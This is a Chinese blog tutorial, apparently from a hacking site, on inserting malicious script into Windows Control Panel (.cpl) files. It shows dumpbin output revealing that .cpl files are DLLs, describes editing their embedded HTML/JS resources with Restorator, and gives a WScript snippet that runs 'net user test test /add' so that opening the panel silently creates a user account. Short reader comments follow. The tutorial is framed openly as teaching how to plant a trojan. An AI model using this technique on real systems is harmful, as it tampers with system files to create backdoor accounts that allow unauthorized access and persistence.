在系统内部中的cpl文件插马【一】

Jonty
2014-10-07 / 4 评论 / 95 阅读 / 正在检测是否收录...

cpl文件是什么,相信很多玩了很久的电脑的人都不知道
列举一个,控制面板中的用户帐户就是cpl文件。
今天就来讲讲如何在cpl文件中插入我们想要的代码

1.了解cpl文件

什么是cpl文件,先来看看百度的定义
上面提到了以.CPL扩展名结尾文件”,既然又与控制面板有关,哪我就来分析一下CPL文件到底是什么吧,随便找一些CPL文件,如:main.cpl,access.cpl等,我用Dumpbin测试结果如下:

C:/WINDOWS/system32>dumpbin main.cpl
Microsoft (R) COFF Binary File Dumper Version 6.00.8168
Copyright (C) Microsoft Corp 1992-1998. All rights reserved.
Dump of file main.cpl
File Type: DLL(由DLL可以知道它是一个DLL文件)
C:/WINDOWS/system32>dumpbin /exports appwiz .cpl
Microsoft (R) COFF Binary File Dumper Version 6.00.8168
Copyright (C) Microsoft Corp 1992-1998. All rights reserved.
Dump of file appwiz.cpl
File Type: DLL
Section contains the following exports for appwiz.dll
ordinal hint RVA name
1 0 00017926 CPlApplet
2 1 00017F05 ConfigStartMenu
......
C:/WINDOWS/system32>dumpbin /exports access.cpl
Microsoft (R) COFF Binary File Dumper Version 6.00.8168
Copyright (C) Microsoft Corp 1992-1998. All rights reserved.
Dump of file access.cpl
File Type: DLL
Section contains the following exports for Access.dll
ordinal hint RVA name
1 0 00004B41 CPlApplet
2 1 00004B33 DebugMain
3 2 00004B30 DllRegisterServer
3 3 00004A27 DllUnregisterServer

从上面的测试结果你看到了什么,我认为至少有两点:

1、 CPL文件就是一个DLL文件
2、 CPL文件都导出了一个CPLApplet函数

这两点揭开了控制面板程序的神秘面纱,你不会再对控制面板程序是什么感到疑惑了,其实,控制面板程序就是一个须导出CPLApplet函数的DLL文件,只是挂上了CPL的后缀名而已。既然都要导出CPLApplet函数,可以想象CPLApplet这个函数的重要性,其实,不光是控制面板,只要是想加载CPL文件的其他所有应用程序都必须取得CPLApplet函数的地址然后通过调用该函数来完成相应得功能的,以下是我从MSDN得来的关于它的声明,详细信息请参考MSDN.

既然上面说了,cpl其实就是一个变体DLL,那么我们来分析下CPL的功能到底是怎么实现的

QQ截图20120811234315

这。。怎么看都像是html作用的,接下来我们拉出我们的神器 : Restorator

Restorator:这是一款很强大的资源树分析软件,完全比得上Reshacker

我们拉进来分析2

果不其然,有个html。接下来我们就来分析了

2.开始插马

我们来看看里面到底是什么3可以很清晰的看到,由htm和js构成、

发现了一段代码:

可以很明确的断定,cpl文件是由Html构成界面,js实现操作的文件

好,接下来我们就来修改

发现htm都定义好了,我们就来找找主页面

4半天的查找结果,找到了这个就是主页的按钮。一打开会自动执行这玩意。

好,现在我们先随便配置个脚本

WshShell = WScript.CreateObject("WScript.Shell");
WshShell.Run("net user test test /add");

好,以上是简单的添加帐户的代码,之后修改js

5以上随便找个修改6

好,保存,打开双击试试

查看效果7

帐户成功添加。、

3.最后总结(最后的话)

这次是教如何插马,但是在严酷的系统战场上是无法满足需求的

地址只能固定却不能修改,这显然是无法达到我们的要求

尽情期待下一期,奇怪的过程调用第二期
By:Black Internet Explorer

本文共 696 个字数,平均阅读时长 ≈ 2分钟
0

打赏

海报

正在生成.....

评论 (4)

取消
  1. 头像
    aaa Lv.1
    中国陕西省 ·Windows XP · Google Chrome
    沙发

    .............kankan

    回复 删除 垃圾
    1. 头像
      gkroot Lv.6
      中国河南省 ·iPhone · UC Browser
      @ aaa

      @aaa 太水了吧。

      回复 删除 垃圾
  2. 头像
    1223 Lv.1
    中国广西壮族自治区 ·Windows XP · Google Chrome
    板凳

    为了看而灌水

    回复 删除 垃圾
    1. 头像
      gkroot Lv.6
      中国山东省 ·iPhone · UC Browser
      @ 1223

      @1223 呵呵呵呵呵呵...

      回复 删除 垃圾